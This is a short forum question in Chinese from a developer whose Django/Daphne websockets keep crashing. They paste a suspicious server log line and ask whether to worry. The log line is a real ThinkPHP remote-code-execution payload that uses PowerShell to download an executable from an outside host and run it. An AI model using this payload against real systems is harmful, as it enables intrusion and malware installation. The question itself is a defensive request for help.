我有一个在 Digital Ocean Ubuntu 服务器上运行的 Django 应用程序。我正在使用 NGINX 和 Daphne 为应用程序提供服务,因为我使用的是 Django Channels。
我的 websockets 不断崩溃,当崩溃发生时,我在日志中注意到此消息:
127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\ap p/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20 /c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hog noob.se/download.exe','%SystemRoot%/Temp/nagagewrehutkiz561.exe');start%20%SystemR oot%/Temp/nagagewrehutkiz561.exe" 404 2111
这对我来说看起来很可疑,但我对安全性的了解很少。谁能帮我确定这是否是我应该关注的事情?
事实上这是一个我没有提交的 GET 请求(目前没有其他人在使用这个服务器)但也许它是我的浏览器自动提交的东西?